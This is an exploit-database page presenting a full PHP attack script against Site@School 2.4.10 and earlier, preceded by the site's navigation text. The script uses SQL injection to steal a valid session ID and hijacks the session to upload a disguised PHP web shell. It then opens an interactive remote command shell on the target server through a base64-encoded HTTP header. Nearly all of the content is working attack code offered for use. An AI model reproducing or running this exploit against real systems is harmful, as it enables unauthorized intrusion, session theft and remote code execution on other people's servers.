0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
[=========================================================================
Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
=========================================================================
<?php
/*
-------------------------------------------------------------------------
Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
-------------------------------------------------------------------------
author...: EgiX
link.....: http://siteatschool.sourceforge.net/
details..: works with magic_quotes_gpc = off
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
63. $query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
64. if ($result = mysql_query($query))
65. {
66. $check_sessioncode = mysql_result($result, 0);
67. unset ($query);
68. unset ($result);
69. }
70. if ($_SESSION['sessioncode'] != $check_sessioncode)
71. {
72. //if we don't have a session present the login screen
73. Header("Location: ../../../../../index.php");
74. exit;
75. }
[...]
117. if ($option == "upload")
118. {
119. if (IsSet ($_FILES["new_file"]["name"]))
120. {
121. $file_name = $_FILES["new_file"]["name"];
122. }
123. if (IsSet ($_SESSION['opendir']))
124. {
125. $write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
126. // moveupload the file to $write_path, function is in core/common.inc.php
127. $temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.
128. sas_move_uploaded_file($write_path, $file_name, $temp_file);
129. }
130. $opendir = $_SESSION['opendir']; //for returning to the directory were we came from
131. }
an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
*/
error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path, $sid;
$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
$packet = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with {$ext} extension...";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
function get_sid()
{
global $host, $path, $prefix;
// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
$sql = "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$pieces = explode(chr(0xFF), http_send($host, $packet));
return $pieces[1];
}
function check_target()
{
global $host, $path, $prefix;
print "\n[-] Checking {$host}...";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
$prefix = $match[1];
}
print "\n+-----------------------------------------------------------------------+";
print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
print "\n+-----------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path \n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to sas directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = get_sid();
if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
else print "\n[-] Hijacking with sid {$sid}\n";
if (!($ext = upload())) die("\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
while(1)
{
print "\nsas-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# 0day.today [2024-11-15] #